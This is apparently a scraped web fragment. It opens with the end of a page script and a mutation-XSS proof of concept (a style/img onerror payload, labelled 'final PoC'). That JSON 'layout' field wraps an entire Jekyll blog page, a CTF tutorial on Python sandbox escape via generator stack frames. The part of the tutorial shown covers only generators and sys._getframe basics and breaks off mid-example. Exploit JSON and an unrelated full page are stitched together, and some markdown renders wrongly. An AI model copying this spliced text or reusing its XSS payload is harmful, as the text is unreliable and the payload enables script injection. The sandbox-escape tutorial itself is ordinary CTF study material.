            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>
img src=x onerror=alert()></style>"}

{"content":"","layoutId":5}

最终poc

  
{"layout":"x<style><<!doctype html>

<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="light">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta property="og:locale" content="en" />
<meta name="description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<meta property="og:description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<link rel="canonical" href="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:url" content="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:site_name" content="DummyKitty’s Blog" />
<meta property="og:image" content="/assets/images/pyjail.jpg" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-11-09T14:23:57+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/images/pyjail.jpg" />
<meta property="twitter:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta name="twitter:site" content="@DummyKitty" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-04-02T00:46:04+00:00","datePublished":"2024-11-09T14:23:57+00:00","description":"pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈","headline":"pyjail bypass-11 利用生成器栈逃逸","image":"/assets/images/pyjail.jpg","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"},"url":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"}</script>
<!-- End Jekyll SEO tag -->

  <title>pyjail bypass-11 利用生成器栈逃逸 | DummyKitty's Blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->

<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="DummyKitty's Blog">
<meta name="application-name" content="DummyKitty's Blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">

  <!-- Resource Hints -->
  
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
  <!-- Bootstrap -->
  
  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  
  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->

<!-- layout specified -->

    <!-- image lazy-loading & popup & clipboard -->
    
  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>

<script defer src="/assets/js/dist/post.min.js"></script>

<!-- Pageviews -->

    <!-- PWA -->
    
      <script
        defer
        src="/app.min.js?baseurl=&register=true"
      ></script>
    
    <!-- Web Analytics -->
    
  <!-- A placeholder to allow defining custom metadata -->

</head>

  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/images/me.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">DummyKitty's Blog</a>
    <p class="site-subtitle fst-italic mb-0">Code Audit@xxx / Penetration Tester@xxx / CTFer</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            
            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            
            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            
            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            
            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
        <a
          href="https://github.com/DummyKitty"
          aria-label="github"
          
            target="_blank"
            
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
        <a
          href="/feed.xml"
          aria-label="rss"
          
        >
          <i class="fas fa-rss"></i>
        </a>
      
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->

    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      
            <span>
              <a href="/">Home</a>
            </span>

              <span>pyjail bypass-11 利用生成器栈逃逸</span>
            
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->

<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->

<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->

<!-- Change the icon of checkbox -->

<!-- Handle images -->

    <!-- take out classes -->
    
    <!-- lazy-load images -->
    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      
        <!-- create the image wrapper -->
        
    <!-- combine -->
    
<!-- Add header for code snippets -->

<!-- Create heading anchors -->

<!-- return -->

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>pyjail bypass-11 利用生成器栈逃逸</h1>
    
    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1731162237"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Nov  9, 2024
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1743554764"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Apr  2, 2025
</time>

        </span>
      
        <div class="mt-3 mb-3">
          <a href="/assets/images/pyjail.jpg" class="popup img-link preview-img shimmer"><img src="/assets/images/pyjail.jpg"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      
      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          
          By

          <em>
            
              <a href="https://twitter.com/DummyKitty">DummyKitty</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          
          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->

<!-- words per minute -->

<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2817 words"
>
  <em>15 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">pyjail bypass-11 利用生成器栈逃逸</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">pyjail bypass-11 利用生成器栈逃逸</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  
  <div class="content">
    <blockquote>
  <ul>
    <li><a href="/posts/python-沙箱逃逸原理/">pyjail 沙箱逃逸原理</a></li>
    <li><a href="/posts/pyjail-bypass-01-绕过删除模块或方法/">绕过删除模块或方法</a></li>
    <li><a href="/posts/pyjail-bypass-02-字符串变换绕过/">绕过基于字符串匹配的过滤</a></li>
    <li><a href="/posts/pyjail-bypass-03-绕过命名空间限制/">绕过命名空间限制</a></li>
    <li><a href="/posts/pyjail-bypass-05-绕过长度限制/">绕过多行限制</a></li>
    <li><a href="/posts/pyjail-bypass-04-绕过多行限制/">绕过长度限制</a></li>
    <li><a href="/posts/pyjail-bypass-06-变量覆盖与函数篡改/">变量覆盖与函数篡改</a></li>
    <li><a href="/posts/pyjail-bypass-07-绕过-audit-hook/">绕过 audit hook</a></li>
    <li><a href="/posts/pyjail-bypass-08-绕过-AST-沙箱/">绕过 AST 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-09-绕过输出限制/">绕过输出限制</a></li>
    <li><a href="/posts/pyjail-bypass-10-绕过-opcode-沙箱/">绕过 opcode 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-11-利用生成器栈/">利用生成器栈</a></li>
  </ul>
</blockquote>

<p>本文仅作为个人学习记录，大部分参考自下面的文章，讲解得非常细致：</p>
<ul>
  <li><a href="https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern">利用生成器栈帧逃逸 Pyjail - CISCN 2024 mossfern 题解</a></li>
</ul>

<h2 id="利用生成器栈帧进行逃逸"><span class="me-2">利用生成器栈帧进行逃逸</span><a href="#利用生成器栈帧进行逃逸" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="生成器"><span class="me-2">生成器</span><a href="#生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>在 Python 中，生成器（Generator）是一种特殊的迭代器，它能够逐个生成值，而不需要一次性将所有值存储在内存中。生成器的主要特点是它们能够 惰性计算，即按需生成数据，这使得它们在处理大量数据或无限序列时非常高效。</p>

<p>生成器通过使用 yield 关键字来返回值，而不是像普通函数那样使用 return。当一个函数包含 yield 时，它就成为了一个生成器函数。调用这个函数不会立即执行，而是返回一个生成器对象。每次调用生成器对象的 next() 方法时，函数会从上次暂停的地方继续执行，直到再次遇到 yield 或结束。</p>
<h4 id="创建生成器"><span class="me-2">创建生成器</span><a href="#创建生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>创建生成器有以下两种方法：</p>
<ol>
  <li>使用 yield 关键字
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre> <span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
     <span class="k">yield</span> <span class="mi">1</span>
     <span class="k">yield</span> <span class="mi">2</span>
     <span class="k">yield</span> <span class="mi">3</span>

 <span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span> <span class="c1"># &lt;class 'generator'&gt;
</span> <span class="nf">print</span><span class="p">(</span><span class="n">gen</span><span class="p">)</span>       <span class="c1"># &lt;generator object my_generator at 0x7f4a20e049e0&gt;
</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span></pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>使用生成器表达式。类似于列表推导式，但使用小括号 () 而不是方括号 [] 来创建生成器表达式。
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre> <span class="n">gen_exp</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">*</span> <span class="n">x</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">5</span><span class="p">))</span>

 <span class="k">for</span> <span class="n">num</span> <span class="ow">in</span> <span class="n">gen_exp</span><span class="p">:</span>
     <span class="nf">print</span><span class="p">(</span><span class="n">num</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div>    </div>
    <h4 id="生成器转化为列表"><span class="me-2">生成器转化为列表</span><a href="#生成器转化为列表" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
    <p>生成器转换为列表可以使用如下的几种方式：</p>
  </li>
  <li>list 构造函数</li>
  <li>列表推导式</li>
  <li><code class="language-plaintext highlighter-rouge">*</code> 解包操作符
```py
gen = (x for x in range(5))<br />
lst = list(gen)</li>
</ol>

<p>gen = (x for x in range(5))<br />
lst = [x for x in gen]</p>

<p>gen = (x for x in range(5))<br />
lst = [*gen]</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>

### 栈帧
在 Python 中，栈帧（Stack Frame）是每次函数调用时创建的执行上下文。每个栈帧包含了函数的局部变量、参数、返回地址等信息，并且这些栈帧按照调用顺序被压入 调用栈（Call Stack）中。

#### 获取栈帧
获取栈帧的基本方法是使用 sys._getframe 方法：
```py
import sys
f1 = sys._getframe()
print(f1)
# &lt;frame at 0x7fb8d49984a0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack.py', line 3, code &lt;module&gt;&gt;
print(type(f1)) # &lt;class 'frame'&gt;
</pre></td></tr></tbody></table></code></div></div>
<p>f1 就是一个栈帧对象。</p>

<p>另一种方法是用 inspect 库的 currentframe 方法</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">inspect</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="nf">currentframe</span><span class="p">()</span>
</pre></td></tr></tbody></table></code></div></div>
<h4 id="交互式命令行的差异"><span class="me-2">交互式命令行的差异</span><a href="#交互式命令行的差异" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>注意，由于 Python 交互式命令行在执行代码时会使用单独的栈帧，因此下面的代码在交互式命令行与脚本文件中执行的结果不同。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="o">&gt;&gt;&gt;</span> <span class="kn">import</span> <span class="n">sys</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span>
<span class="bp">False</span>
</pre></td></tr></tbody></table></code></div></div>
<p>直接执行脚本文件时返回 True</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">f1</span><span class="p">))</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span><span class="p">)</span> <span class="c1"># True
</span></pre></td></tr></tbody></table></code></div></div>
<h4 id="栈帧工作原理"><span class="me-2">栈帧工作原理</span><a href="#栈帧工作原理" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>栈帧的工作原理如下：</p>
<ol>
  <li>当程序开始执行时，会创建一个==全局帧（global frame）==，它是整个程序的顶层上下文。</li>
  <li>每当==调用一个函数时，Python 会创建一个新的栈帧，并将其压入调用栈顶部==。</li>
  <li>==当函数完成执行后，当前栈帧会被弹出，并将控制权返回给上一个栈帧==。</li>
  <li>这种过程持续进行，直到所有函数都执行完毕，最终回到全局帧。</li>
</ol>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">global frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">add() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">multiply() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># global frame: &lt;frame at 0x7f5793d5a400, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 3, code &lt;module&gt;&gt;
# multiply() frame: &lt;frame at 0x7f5793d35480, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 11, code multiply&gt;
# add() frame: &lt;frame at 0x7f5793d34940, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 6, code add&gt;
</span></pre></td></tr></tbody></table></code></div></div>

<h4 id="栈帧的内容"><span class="me-2">栈帧的内容</span><a href="#栈帧的内容" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>使用 dir 查看栈帧的内容：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre><span class="nf">dir</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__delattr__',
#  '__dir__',
#  '__doc__',
#  '__eq__',
#  '__format__',
#  '__subclasshook__',
#  ...
#  'clear',
#  'f_back',
#  'f_builtins',
#  'f_code',
#  'f_globals',
#  'f_lasti',
#  'f_lineno',
#  'f_locals',
#  'f_trace',
#  'f_trace_lines',
#  'f_trace_opcodes']
</span></pre></td></tr></tbody></table></code></div></div>
<p>除了 Object 共有的属性之外，有一些 f_ 开头的属性是栈帧对象独有的。</p>
<ul>
  <li>f_back：它是指向上一个栈帧的指针。在 Python 中，f1.f_back 拿到的也是一个栈帧对象。</li>
  <li>f_builtins、f_globals、f_locals：对应着当前栈帧的 builtins、globals、locals 对象。</li>
</ul>

<p>我们可以使用前面的脚本进行测试：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">global_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="n">multiply_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="n">add_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="c1"># print(f"global frame: {global_frame}")
</span><span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">add_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"add() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">multiply_frame</span> <span class="o">==</span> <span class="n">add_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">multiply_frame</span>
    <span class="n">multiply_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"multiply() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">global_frame</span> <span class="o">==</span> <span class="n">multiply_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

